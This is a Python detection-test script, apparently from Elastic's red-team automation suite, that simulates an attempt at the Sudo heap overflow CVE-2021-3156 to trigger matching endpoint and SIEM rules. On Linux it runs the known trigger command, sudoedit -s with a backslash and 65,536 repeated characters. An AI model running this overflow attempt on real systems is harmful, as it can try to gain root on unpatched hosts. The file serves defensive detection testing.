# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.

from . import common
from . import RtaMetadata


metadata = RtaMetadata(
    uuid="da35cb80-dad9-4995-ac11-6a408843cd12",
    platforms=["linux", "macos"],
    endpoint=[
        {"rule_name": "Sudo Heap-Based Buffer Overflow Attempt", "rule_id": "95718a3c-edc7-46ef-978b-77891ca6198f"}
    ],
    siem=[{"rule_name": "Sudo Heap-Based Buffer Overflow Attempt", "rule_id": "f37f3054-d40b-49ac-aa9b-a786c74c58b8"}],
    techniques=["T1068", "T1059"],
)


@common.requires_os(*metadata.platforms)
def main():
    common.log(
        "Executing command to simulate attempted use of a heap-based buffer overflow vulnerability for the "
        "Sudo binary in Unix-like systems(CVE-2021-3156)"
    )
    # The exploit reproduction is available
    # https://www.sudo.ws/security/advisories/unescape_overflow/
    # https://blog.aquasec.com/cve-2021-3156-sudo-vulnerability-allows-root-privileges

    if common.CURRENT_OS == "macos":
        masquerade = "/tmp/sudo"
        common.create_macos_masquerade(masquerade)
        common.execute([masquerade, "-s", "sudoedit", "*\\\\"], timeout=10, kill=True)
    else:
        cmd = """sudoedit -s '\\' `perl -e 'print "A" x 65536'`"""
        common.execute(f'bash -c "{cmd}"', shell=True)


if __name__ == "__main__":
    exit(main())